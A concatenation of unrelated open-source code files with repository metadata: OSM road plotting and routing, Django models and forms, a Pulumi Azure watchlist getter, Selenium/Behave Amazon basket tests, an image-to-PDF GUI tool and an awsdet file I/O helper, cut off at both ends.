x = float(nodes[nID['ref']]['lon'])
if oldX == None:
# first point in road way
p.plot([x],[y],
marker = thisRendering['_firstmarker'],
markeredgecolor = thisRendering['_firstmarkeredgecolor'],
markeredgewidth = thisRendering['_firstmarkeredgewidth'],
markerfacecolor = thisRendering['_firstmarkerfacecolor'],
markersize = thisRendering['_firstmarkersize'],
zorder = thisRendering['_firstzorder'],
)
elif nCnt<(len(ways[nodeID]['nd'])-1):
p.plot([oldX,x],[oldY,y],
marker = '',
linestyle = thisRendering['linestyle'],
linewidth = thisRendering['linewidth'],
color = thisRendering['color'],
alpha = thisRendering['alpha'],
solid_capstyle = thisRendering['solid_capstyle'],
solid_joinstyle = thisRendering['solid_joinstyle'],
zorder = thisRendering['zorder'],
)
p.plot([x],[y],
marker = thisRendering['marker'],
markeredgecolor = thisRendering['markeredgecolor'],
markeredgewidth = thisRendering['markeredgewidth'],
markerfacecolor = thisRendering['markerfacecolor'],
markersize = thisRendering['markersize'],
color = thisRendering['color'],
alpha = thisRendering['alpha'],
zorder = thisRendering['markerzorder'],
)
else:
# last segment in road way
p.plot([oldX,x],[oldY,y],
marker = '',
linestyle = thisRendering['linestyle'],
linewidth = thisRendering['linewidth'],
color = thisRendering['color'],
alpha = thisRendering['alpha'],
solid_capstyle = thisRendering['solid_capstyle'],
solid_joinstyle = thisRendering['solid_joinstyle'],
zorder = thisRendering['zorder'],
)
oldX = x
oldY = y
# last point in road way
p.plot([x],[y],
marker = thisRendering['_lastmarker'],
markeredgecolor = thisRendering['_lastmarkeredgecolor'],
markeredgewidth = thisRendering['_lastmarkeredgewidth'],
markerfacecolor = thisRendering['_lastmarkerfacecolor'],
markersize = thisRendering['_lastmarkersize'],
zorder = thisRendering['_lastzorder'],
)
except KeyError:
pass
if idx%100 == 0:
print(idx)
#p.ioff()
print('Done Plotting')
p.show()
def nodeDist(nodes,oldNodeID,newNodeID):
y0 = float(nodes[oldNodeID]['lat'])
x0 = float(nodes[oldNodeID]['lon'])
y1 = float(nodes[newNodeID]['lat'])
x1 = float(nodes[newNodeID]['lon'])
return ((x0-x1)**2+(y0-y1)**2)**(0.5)
from scipy import sparse
def linkNodes():
# make dictionary of node IDs
nodes = {}
for node in myMap['node']:
nodes[node['id']] = node
ways = {}
for way in myMap['way']:
ways[way['id']]=way
neighborDict = {}
print(len(nodes))
print(len(ways))
M = sparse.lil_matrix((len(nodes),len(nodes)))
nodeID_List = sorted(nodes.keys())
# walk each way and enter distance for nodes in way node list
for wayID in ways.keys():
way = ways[wayID]
wayTags = way['tag']
if not wayTags==None:
hwyTypeList = [d['v'] for d in wayTags if d['k']=='highway']
if len(hwyTypeList)>0:
wayType = hwyTypeList[0]
else:
wayType = None
if wayType in ['primary_link','primary',
'secondary','secondary_link',
'tertiary','tertiary_link',
'motorway','motorway_link',
'service',
'residential',
'unclassified',
'multipolygon'
]:
# this way is a highway of some sort
for idx,node in enumerate(way['nd']):
if idx==0:
oldNodeID = node['ref']
oldNodeIdx = nodeID_List.index(oldNodeID)
else:
newNodeID = node['ref']
distance = nodeDist(nodes,oldNodeID,newNodeID)
newNodeIdx = nodeID_List.index(newNodeID)
M[oldNodeIdx,newNodeIdx]=distance
M[newNodeIdx,oldNodeIdx]=distance
try:
neighborDict[oldNodeID].append(newNodeID)
except KeyError:
neighborDict[oldNodeID] = [newNodeID]
try:
neighborDict[newNodeID].append(oldNodeID)
except KeyError:
neighborDict[newNodeID] = [oldNodeID]
oldNodeID = newNodeID
oldNodeIdx = newNodeIdx
return (M,nodeID_List, neighborDict)
##
## print('Linking end nodes')
##
## wayLinks = {}
## for firstWayID in wayType.keys():
## firstNodeSet = set([id['ref'] for id in ways[firstWayID]['nd']])
## for secondWayID in wayType.keys():
## secondNodeSet = set([id['ref'] for id in ways[secondWayID]['nd']])
## if any(firstNodeSet.intersection(secondNodeSet)):
## if firstWayID <> secondWayID:
## try:
## wayLinks[firstWayID].append(secondWayID)
## except KeyError:
## wayLinks[firstWayID]=[secondWayID]
##
## ## if ((endNodes[firstWayID][0] in ways[secondWayID]['nd']) or
## ## (endNodes[firstWayID][1] in ways[secondWayID]['nd'])):
## ## if firstWayID <> secondWayID:
## ## try:
## ## wayLinks[firstWayID].append(secondWayID)
## ## except KeyError:
## ## wayLinks[firstWayID]=[secondWayID]
##
##
## print(len(wayLinks.keys()))
##
##import cProfile
##cProfile.run('main()','multiWeightingRouting_002.prof')
#src = file("map_campus_gyor01.osm") # basestring python 2 version
src = open("map_campus_gyor01.osm")
myMap = xml2obj(src)
main()
(M,nodeID_List,neighborDict)=linkNodes()
##from matplotlib.pyplot import figure, show
##import numpy
##
##fig = figure()
##ax1 = fig.add_subplot(111)
##
##ax1.spy(M, precision=0.00001)
##
##show()
""""
from AStarSearch import *
def neighbor_nodes(x):
rowIdx = nodeID_List.index(x)
row = M[rowIdx,:]
rowValues = []
for i in range(0,row.get_shape()[1]):
rowValues.append(row[0,i])
nodeList = [nodeID_List[colIdx] for colIdx,val in enumerate(rowValues) if val>0]
return nodeList
##def build_neighbor_Dict():
## neighborDict = {}
## for rowIdx,nodeID in enumerate(nodeID_List):
## row = M[rowIdx,:]
## rowValues = []
## for i in range(0,row.get_shape()[1]):
## rowValues.append(row[0,i])
## nodeList = [nodeID_List[colIdx] for colIdx,val in enumerate(rowValues) if val>0]
## neighborDict[nodeID]=nodeList
##
## if rowIdx%100 == 0: print '... finished row #%i' % rowIdx
## return neighborDict
def neighbor_node_lookup(x):
return neighborDict[x]
def distance_between(x,y):
rowIdx = nodeID_List.index(x)
colIdx = nodeID_List.index(y)
return M[rowIdx,colIdx]
##print 'Building Neighbor Node Dictionary'
##neighborDict = build_neighbor_Dict()
print 'Routing...'
print Astar("61916608","820007070",distance_between,neighbor_node_lookup,distance_between)
print 'Done'
""" | [
"horverno@gmail.com"
] | horverno@gmail.com |
81ceb438b92b56de14e3d9cdc5c79b3fdbaa1ff1 | d2ed0c6b479e826039d6ce848e911100341c3373 | /Sum_of_diagonals.py | 348bd395141a45a6a23fa02b31268af57e48f4da | [] | no_license | Ajith-Kumar-V/Guvicodekatta | 595b9672136f221b4f06ecb3de2fdfda6dbc6600 | 7d510b689eafb1c31d94104aaef89654d901a351 | refs/heads/master | 2023-05-11T22:15:35.797834 | 2023-05-02T06:34:54 | 2023-05-02T06:34:54 | 223,870,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | n=int(input())
l=[]
for i in range(n):
h=[int(x) for x in input().split()][:n]
l.append(h)
k=0
o=0
for i in range(n):
for j in range(n):
if (i==j):
k=k+l[i][j]
if ((i+j)==(n-1)):
o=o+l[i][j]
print(k*o)
| [
"noreply@github.com"
] | Ajith-Kumar-V.noreply@github.com |
f19f741ea3c34845081181763d347520a1caa887 | 619f292b7da344fcf16418f1f3ed31eb76ecfbc7 | /accounts/models.py | cab65acd7c0b679e83b2150af80ec43fed73b319 | [] | no_license | AhmadShalein/drf-auth | 1c1d692e122d0b28673641355f8be51fc3265f3c | 055d4cba1a155a4a9c13993739f0b373cd712d1a | refs/heads/master | 2023-08-05T08:11:25.438323 | 2021-09-10T21:35:31 | 2021-09-10T21:35:31 | 404,116,860 | 0 | 0 | null | 2021-09-10T21:35:32 | 2021-09-07T20:40:59 | Python | UTF-8 | Python | false | false | 183 | py | from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
pass
# add additional fields in here
def __str__(self):
return self.username | [
"ahmadshalein@gmail.com"
] | ahmadshalein@gmail.com |
f4a69f5e7bb25cf7ff64d9bae0aa9e8d7ad77f17 | 409adbf0d2f6a54e0c026c6ae454ce141d90ac82 | /checkout_sdk/payments/payment_action_response.py | d7f80c3c16b4cc8d807b2db39c463041a8ad1044 | [
"MIT"
] | permissive | intelligems/checkout-sdk-python | 13a4934dc2d178d3d108355ae842f35a1ab5594c | 729eb99a76e3a139c59ad045ff6d1fbd1252141d | refs/heads/master | 2020-04-08T05:56:49.092606 | 2018-11-28T08:23:38 | 2018-11-28T08:23:38 | 159,079,942 | 0 | 1 | MIT | 2018-11-27T10:16:23 | 2018-11-25T22:18:40 | Python | UTF-8 | Python | false | false | 621 | py | from checkout_sdk.payments import PaymentResponse
class PaymentActionResponse(PaymentResponse):
@property
def created(self):
return self._response.body['created']
@property
def track_id(self):
return self._response.body['trackId']
@property
def currency(self):
return self._response.body['currency']
@property
def value(self):
return self._response.body['value']
@property
def response_code(self):
return self._response.body['responseCode']
@property
def approved(self):
return str(self.response_code).startswith('1')
| [
"noreply@github.com"
] | intelligems.noreply@github.com |
b755ac44206a9c9dda1a389710cdf3a9fba8ec30 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/securityinsights/v20190101preview/get_watchlist.py | c72fb1c220e6a8ad7528ffa0f04b1c3a81368bad | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,021 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetWatchlistResult',
'AwaitableGetWatchlistResult',
'get_watchlist',
]
@pulumi.output_type
class GetWatchlistResult:
"""
Represents a Watchlist in Azure Security Insights.
"""
def __init__(__self__, created_by=None, created_time_utc=None, default_duration=None, description=None, display_name=None, etag=None, labels=None, last_updated_time_utc=None, name=None, notes=None, provider=None, source=None, tenant_id=None, type=None, updated_by=None, watchlist_items=None, watchlist_type=None, workspace_id=None):
if created_by and not isinstance(created_by, dict):
raise TypeError("Expected argument 'created_by' to be a dict")
pulumi.set(__self__, "created_by", created_by)
if created_time_utc and not isinstance(created_time_utc, str):
raise TypeError("Expected argument 'created_time_utc' to be a str")
pulumi.set(__self__, "created_time_utc", created_time_utc)
if default_duration and not isinstance(default_duration, str):
raise TypeError("Expected argument 'default_duration' to be a str")
pulumi.set(__self__, "default_duration", default_duration)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if display_name and not isinstance(display_name, str):
raise TypeError("Expected argument 'display_name' to be a str")
pulumi.set(__self__, "display_name", display_name)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if labels and not isinstance(labels, list):
raise TypeError("Expected argument 'labels' to be a list")
pulumi.set(__self__, "labels", labels)
if last_updated_time_utc and not isinstance(last_updated_time_utc, str):
raise TypeError("Expected argument 'last_updated_time_utc' to be a str")
pulumi.set(__self__, "last_updated_time_utc", last_updated_time_utc)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if notes and not isinstance(notes, str):
raise TypeError("Expected argument 'notes' to be a str")
pulumi.set(__self__, "notes", notes)
if provider and not isinstance(provider, str):
raise TypeError("Expected argument 'provider' to be a str")
pulumi.set(__self__, "provider", provider)
if source and not isinstance(source, str):
raise TypeError("Expected argument 'source' to be a str")
pulumi.set(__self__, "source", source)
if tenant_id and not isinstance(tenant_id, str):
raise TypeError("Expected argument 'tenant_id' to be a str")
pulumi.set(__self__, "tenant_id", tenant_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if updated_by and not isinstance(updated_by, dict):
raise TypeError("Expected argument 'updated_by' to be a dict")
pulumi.set(__self__, "updated_by", updated_by)
if watchlist_items and not isinstance(watchlist_items, list):
raise TypeError("Expected argument 'watchlist_items' to be a list")
pulumi.set(__self__, "watchlist_items", watchlist_items)
if watchlist_type and not isinstance(watchlist_type, str):
raise TypeError("Expected argument 'watchlist_type' to be a str")
pulumi.set(__self__, "watchlist_type", watchlist_type)
if workspace_id and not isinstance(workspace_id, str):
raise TypeError("Expected argument 'workspace_id' to be a str")
pulumi.set(__self__, "workspace_id", workspace_id)
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> Optional['outputs.UserInfoResponse']:
"""
Describes a user that created the watchlist
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="createdTimeUtc")
def created_time_utc(self) -> Optional[str]:
"""
The time the watchlist was created
"""
return pulumi.get(self, "created_time_utc")
@property
@pulumi.getter(name="defaultDuration")
def default_duration(self) -> Optional[str]:
"""
The default duration of a watchlist (in ISO 8601 duration format)
"""
return pulumi.get(self, "default_duration")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
A description of the watchlist
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
"""
The display name of the watchlist
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def labels(self) -> Optional[Sequence[str]]:
"""
List of labels relevant to this watchlist
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="lastUpdatedTimeUtc")
def last_updated_time_utc(self) -> Optional[str]:
"""
The last time the watchlist was updated
"""
return pulumi.get(self, "last_updated_time_utc")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def notes(self) -> Optional[str]:
"""
The notes of the watchlist
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter
def provider(self) -> str:
"""
The provider of the watchlist
"""
return pulumi.get(self, "provider")
@property
@pulumi.getter
def source(self) -> str:
"""
The source of the watchlist
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[str]:
"""
The tenantId where the watchlist belongs to.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="updatedBy")
def updated_by(self) -> Optional['outputs.UserInfoResponse']:
"""
Describes a user that updated the watchlist
"""
return pulumi.get(self, "updated_by")
@property
@pulumi.getter(name="watchlistItems")
def watchlist_items(self) -> Optional[Sequence['outputs.WatchlistItemResponse']]:
"""
List of watchlist items.
"""
return pulumi.get(self, "watchlist_items")
@property
@pulumi.getter(name="watchlistType")
def watchlist_type(self) -> Optional[str]:
"""
The type of the watchlist
"""
return pulumi.get(self, "watchlist_type")
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> Optional[str]:
"""
The workspaceId where the watchlist belongs to.
"""
return pulumi.get(self, "workspace_id")
class AwaitableGetWatchlistResult(GetWatchlistResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWatchlistResult(
created_by=self.created_by,
created_time_utc=self.created_time_utc,
default_duration=self.default_duration,
description=self.description,
display_name=self.display_name,
etag=self.etag,
labels=self.labels,
last_updated_time_utc=self.last_updated_time_utc,
name=self.name,
notes=self.notes,
provider=self.provider,
source=self.source,
tenant_id=self.tenant_id,
type=self.type,
updated_by=self.updated_by,
watchlist_items=self.watchlist_items,
watchlist_type=self.watchlist_type,
workspace_id=self.workspace_id)
def get_watchlist(operational_insights_resource_provider: Optional[str] = None,
resource_group_name: Optional[str] = None,
watchlist_alias: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWatchlistResult:
"""
Use this data source to access information about an existing resource.
:param str operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param str resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
:param str watchlist_alias: Watchlist Alias
:param str workspace_name: The name of the workspace.
"""
__args__ = dict()
__args__['operationalInsightsResourceProvider'] = operational_insights_resource_provider
__args__['resourceGroupName'] = resource_group_name
__args__['watchlistAlias'] = watchlist_alias
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:securityinsights/v20190101preview:getWatchlist', __args__, opts=opts, typ=GetWatchlistResult).value
return AwaitableGetWatchlistResult(
created_by=__ret__.created_by,
created_time_utc=__ret__.created_time_utc,
default_duration=__ret__.default_duration,
description=__ret__.description,
display_name=__ret__.display_name,
etag=__ret__.etag,
labels=__ret__.labels,
last_updated_time_utc=__ret__.last_updated_time_utc,
name=__ret__.name,
notes=__ret__.notes,
provider=__ret__.provider,
source=__ret__.source,
tenant_id=__ret__.tenant_id,
type=__ret__.type,
updated_by=__ret__.updated_by,
watchlist_items=__ret__.watchlist_items,
watchlist_type=__ret__.watchlist_type,
workspace_id=__ret__.workspace_id)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
a23f563e1df219a658a0f8c8d16322002848dada | 70765f9e1ba53a8a10fac19b5400da02cc72973e | /features/steps/addItem.py | 134387198429ad304551fc0319e51c7573a63b43 | [] | no_license | ian-m-robinson/BehaveFeature1 | 4c25570586b4d0d707fff3e258b499402f411f83 | ed2d2d2f05e05682648970053e7fad354ac0e534 | refs/heads/master | 2023-03-08T01:11:33.606461 | 2021-02-21T11:48:25 | 2021-02-21T11:48:25 | 340,887,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,484 | py | from behave import *
from selenium import webdriver
from pageObjects.amazonSelection import AmazonHelper
driver = webdriver.Chrome(executable_path="C:/WebDrivers/Chrome/88.0.4324.96/chromedriver.exe")
driver.implicitly_wait(10)
driver.maximize_window()
driver.get('https://www.amazon.co.uk/')
##### 1 #####
@given('the users basket has "{count}" items in it')
def getBasketCount(context, count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if curCount == count:
assert True
else:
assert False
@when('the user adds the item to the basket')
def addItem2Basket(context):
amazon = AmazonHelper(driver)
amazon.addItem2Basket("gordons gin")
@then('the users basket has "{count}" items in it')
def verifyBasketCount(context, count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if curCount == count:
assert True
else:
assert False
##### 2 #####
@given('the users basket has at least "{count}" item')
def checkBasketCount(context, count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if curCount == count:
assert True
else:
assert False
@when('the user adds another item to the basket')
def addAnotherItem(context):
amazon = AmazonHelper(driver)
#amazon.addItem2Basket("fever tree tonic")
amazon.addItem2Basket("Yorkshire Tonic Water Mixed Variety Selection Pack")
@then('the users basket has "{count}" more item in it')
def verifyItemCount(context, count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if int(curCount) == (int(count) + 1):
assert True
else:
assert False
##### 3 #####
@given('the users basket has at least "{count}" item in it')
def checkBasketCount(context,count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if curCount >= count:
assert True
else:
assert False
@when('the user adds more than "{count}" item to the basket')
def openHomepage(context, count):
amazon = AmazonHelper(driver)
amazon.addMultipleItems2Basket("smirnoff vodka 1ltr", int(count)+2)
@then('the users basket has more than "{count}" item in it')
def verifyLogo(context, count):
amazon = AmazonHelper(driver)
curCount = amazon.getBasketCount()
if curCount >= count:
assert True
else:
assert False
@then('teardown browser')
def closeBrowser(context):
driver.close() | [
"ian.robinson@grassvalley.com"
] | ian.robinson@grassvalley.com |
c5ca7cefe08c0d9afc5de1026d5235f3313881e0 | 991c41603a460870f66b8017c7b1e17ca3cef1eb | /MouseLocation32.py | ef9080adc741c5fe775a2c335b56f1fc75c1f6da | [] | no_license | xiangpengBu/angle | 2953ae926fa423b94df0769750b58ac1069c5a49 | cd4cacb8383de687ca8db609e605455905193421 | refs/heads/master | 2022-11-09T18:34:19.537581 | 2020-06-22T08:30:45 | 2020-06-22T08:30:45 | 274,082,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | # -*- coding: utf-8 -*-
"""
作者:小卜
功能:鼠标键盘控制word
版本:v1.0
日期:2019/07/21
"""
import pyautogui
try:
while True:
x, y = pyautogui.position()
print(x, y)
except KeyboardInterrupt:
print('\nExit.') | [
"xiangpeng.bu@gmail.com"
] | xiangpeng.bu@gmail.com |
3f80baeaee8814fce5876d1fd05427e8e5961cfc | 281a10505f8044dbed73f11ed731bd0fbe23e0b5 | /expenseApp/forms.py | a27cb1ba630beb7e285f40eca794838affed173f | [
"Apache-2.0"
] | permissive | cs-fullstack-fall-2018/project3-django-jpark1914 | 7c6f57ab5f8055c11ac5b9d3c8bf0aa5057008d7 | 53bca13243d7e50263ec25b2fb8a299a8bbada1c | refs/heads/master | 2020-04-02T00:59:33.254360 | 2018-10-29T04:58:42 | 2018-10-29T04:58:42 | 153,831,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | from .models import AccountModel, UserSetup, TransactionModel
from django import forms
class AccountForm(forms.ModelForm):
class Meta:
model = AccountModel
fields = ['account_name','balance','savings','deposit', 'expense']
widgets = {'balance': forms.HiddenInput, 'savings':forms.HiddenInput(), 'deposit': forms.HiddenInput(), 'expense': forms.HiddenInput()}
class DepositForm(forms.ModelForm):
class Meta:
model = AccountModel
fields = ['deposit','expense']
widgets = {'expense': forms.HiddenInput()}
class ExpenseForm(forms.ModelForm):
class Meta:
model = AccountModel
fields = ['expense']
class UserForm(forms.ModelForm):
class Meta:
model = UserSetup
fields = ['name', 'email', 'password']
widgets = {
'password': forms.PasswordInput(),
}
| [
"parkerj4321@gmail.com"
] | parkerj4321@gmail.com |
2bb25eec64ffb25dc4f7dbffaaeabcdea013bc40 | ec368665385e591759114b8d614ac82a11ecbc4d | /image_to_pdf.py | a36903822a5dff7a47040005c2e9f9de92f3f377 | [] | no_license | driverxxvii/PDF_Tools | 454d4689307b6b9731e70fd12e4590e1a21569a6 | 4ec01519a6e27681225867eddf543cceb96e5073 | refs/heads/master | 2022-12-21T09:40:09.404074 | 2020-10-01T20:57:54 | 2020-10-01T20:57:54 | 268,502,576 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,083 | py | import pathlib
import img2pdf
import PySimpleGUI as sg
import os
import subprocess
from configparser import ConfigParser
def verify_folder_path(folder_path):
folder_path = pathlib.Path(folder_path)
if folder_path.is_dir():
return True
else:
return False
def get_image_list(source_path):
source_path = pathlib.Path(source_path)
img_list = []
for file in source_path.iterdir():
if file.suffix.lower() in (".jpg", ".png") and file.is_file():
img_list.append(str(file))
return img_list
def create_pdf_from_images(img_list, save_path, file_name):
file_name = f"{file_name}.pdf"
save_file_name = pathlib.Path(save_path).joinpath(file_name)
# Check if there are any images in the source folder
if len(img_list) == 0:
sg.popup("There are no image files in the source folder")
return
if save_file_name.exists():
answer = sg.popup_yes_no("pdf file with the same name already exists\n"
"Do you want to overwrite it?")
if answer == "No":
return
with open(save_file_name, "wb") as f:
f.write(img2pdf.convert(img_list))
sg.popup_ok(f"{save_file_name.name} created in\n"
f"{save_path}")
def read_config_info(section, option):
config = ConfigParser()
config_file = pathlib.Path(os.getcwd()).joinpath("Image_to_pdf.ini")
if not config_file.exists():
config.add_section("settings")
config.set("settings", "source", "")
config.set("settings", "destination", "")
config.set("settings", "filename", "ImageToPDF")
config.set("settings", "chk_open_folder", "")
config.set("settings", "chk_open_pdf", "")
with open(config_file, "w") as f:
config.write(f)
config.read(config_file)
return config.get(section, option)
def write_config_info(section, option, value):
config = ConfigParser()
config_file = pathlib.Path(os.getcwd()).joinpath("Image_to_pdf.ini")
config.read(config_file)
config.set(section, option, value)
with open(config_file, "w") as f:
config.write(f)
def get_num_of_files(source_path, file_types):
source_path = pathlib.Path(source_path)
num_of_files = len([file for file in source_path.iterdir() if file.suffix.lower() in file_types])
return num_of_files
def get_total_file_size(source_path, file_types):
total_size = 0
source_path = pathlib.Path(source_path)
for file in source_path.iterdir():
file = pathlib.Path(file)
if file.suffix.lower() in file_types:
total_size += os.path.getsize(file)
total_size = total_size / 1024 ** 2
# format the size to correct number of decimal places
if int(total_size) < 10:
total_size = round(total_size, 2)
elif int(total_size) < 100:
total_size = round(total_size, 1)
else:
total_size = int(total_size)
return total_size
def open_save_folder(folder_path):
try:
folder_path = pathlib.Path(folder_path)
subprocess.call(["cmd", r"/c", "start", r"/max", folder_path])
except Exception as ex:
sg.popup_ok(f"An error occured while trying to open folder\n"
f"{folder_path}\n"
f"Error - {ex}")
def open_pdf_file(file_path, file_name):
file_name = f"{file_name}.pdf"
file_path = pathlib.Path(file_path)
file_path = file_path.joinpath(file_name)
subprocess.Popen([file_path], shell=True)
def gui_layout():
source_path = read_config_info("settings", "source")
save_path = read_config_info("settings", "destination")
file_name = read_config_info("settings", "filename")
chk_open_folder = bool(read_config_info("settings", "chk_open_folder"))
chk_open_pdf = bool(read_config_info("settings", "chk_open_pdf"))
sg.theme("Light Green")
images_frame = [
[sg.Text(f"Select the source folder where images are located")],
[sg.Input(source_path, disabled=False, enable_events=True, key="source_path"),
sg.FolderBrowse()],
[sg.Text("", size=(47, 1), key="num_of_images")]
]
pdf_frame = [
[sg.Text("Select the folder to save the PDF file in")],
[sg.Input(save_path, disabled=False, key="save_path"),
sg.FolderBrowse()],
[sg.Text("Save as filename"),
sg.Input(file_name, key="save_file_name", size=(38, 1))],
[sg.Text("", size=(47, 1), key="pdf_size_label")],
]
layout = [
[sg.Frame("Images", images_frame)],
[sg.Frame("PDF File", pdf_frame)],
[sg.Checkbox("Open folder after pdf is created", key="chk_open_folder",
enable_events=True, default=chk_open_folder)],
[sg.Checkbox("Open PDF file after creating it", key="chk_open_pdf",
enable_events=True, default=chk_open_pdf)],
[sg.Button("Create PDF", key="Create PDF", size=(10, 1)),
sg.Button("Exit", size=(10, 1))],
# [sg.Button("Test", key="Test")]
]
return sg.Window("Images to PDF", layout, finalize=True)
def event_loop():
window = gui_layout()
while True:
event, values = window.read()
if event in (None, "Exit"):
window.close()
break
if event == "chk_open_folder":
if values["chk_open_folder"]:
write_config_info("settings", "chk_open_folder", "1")
else:
# bool("") evaluates to False
write_config_info("settings", "chk_open_folder", "")
if event == "chk_open_pdf":
if values["chk_open_pdf"]:
write_config_info("settings", "chk_open_pdf", "1")
else:
write_config_info("settings", "chk_open_pdf", "")
if event == "source_path":
source_path = values["source_path"]
if verify_folder_path(source_path):
file_types = [".jpg", ".png"]
num_files = get_num_of_files(source_path, file_types)
total_size = get_total_file_size(source_path, file_types)
message = f"There are {num_files} images in the selected folder"
pdf_size_message = f"Estimated file size of PDF: {total_size} MB"
window["num_of_images"].update(message)
window["pdf_size_label"].update(pdf_size_message)
if event == "Create PDF":
source_path = values["source_path"] # read values from input boxes
save_path = values["save_path"]
save_file_name = values["save_file_name"]
if source_path == "" or save_path == "":
sg.popup("Please select a source and destination folder")
elif not verify_folder_path(source_path):
sg.popup("The source folder specified is invalid\n"
"Please select a valid folder")
elif not verify_folder_path(save_path):
sg.popup("The save folder specified is invalid\n"
"Please select a valid folder")
else:
write_config_info("settings", "source", source_path)
write_config_info("settings", "destination", save_path)
write_config_info("settings", "filename", save_file_name)
image_list = get_image_list(source_path)
create_pdf_from_images(image_list, save_path, save_file_name)
if values["chk_open_folder"]:
open_save_folder(save_path)
if values["chk_open_pdf"]:
open_pdf_file(save_path, save_file_name)
def main():
event_loop()
if __name__ == '__main__':
main()
# todo
# fixme
# large image files cause crash. Use PIL thumbnail to reduce size
| [
"noreply@github.com"
] | driverxxvii.noreply@github.com |
5443d92465ce82b11372495fff29617c70497999 | eba78a0880b0c1e11b86ec43d36ae4aaf211fe93 | /models/vision/detection/awsdet/utils/fileio/io.py | 39596c9b35df4ec2518ca9625d78690c61c0815c | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | sagardotme/deep-learning-models | 54a9a2d5885d1678e7b3e9caa234b5d597808c15 | c4ebbdacf10af45a29dc1f5ad40df4c90d978184 | refs/heads/master | 2022-11-13T06:23:41.615005 | 2020-06-22T22:07:00 | 2020-06-22T22:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,793 | py | # Copyright (c) Open-MMLab. All rights reserved.
from pathlib import Path
from awsdet.utils.generic import is_list_of, is_str
from .handlers import BaseFileHandler, JsonHandler, PickleHandler, YamlHandler
file_handlers = {
'json': JsonHandler(),
'yaml': YamlHandler(),
'yml': YamlHandler(),
'pickle': PickleHandler(),
'pkl': PickleHandler()
}
def load(file, file_format=None, **kwargs):
"""Load data from json/yaml/pickle files.
This method provides a unified api for loading data from serialized files.
Args:
file (str or :obj:`Path` or file-like object): Filename or a file-like
object.
file_format (str, optional): If not specified, the file format will be
inferred from the file extension, otherwise use the specified one.
Currently supported formats include "json", "yaml/yml" and
"pickle/pkl".
Returns:
The content from the file.
"""
if isinstance(file, Path):
file = str(file)
if file_format is None and is_str(file):
file_format = file.split('.')[-1]
if file_format not in file_handlers:
raise TypeError('Unsupported format: {}'.format(file_format))
handler = file_handlers[file_format]
if is_str(file):
obj = handler.load_from_path(file, **kwargs)
elif hasattr(file, 'read'):
obj = handler.load_from_fileobj(file, **kwargs)
else:
raise TypeError('"file" must be a filepath str or a file-object')
return obj
def dump(obj, file=None, file_format=None, **kwargs):
"""Dump data to json/yaml/pickle strings or files.
This method provides a unified api for dumping data as strings or to files,
and also supports custom arguments for each file format.
Args:
obj (any): The python object to be dumped.
file (str or :obj:`Path` or file-like object, optional): If not
specified, then the object is dump to a str, otherwise to a file
specified by the filename or file-like object.
file_format (str, optional): Same as :func:`load`.
Returns:
bool: True for success, False otherwise.
"""
if isinstance(file, Path):
file = str(file)
if file_format is None:
if is_str(file):
file_format = file.split('.')[-1]
elif file is None:
raise ValueError(
'file_format must be specified since file is None')
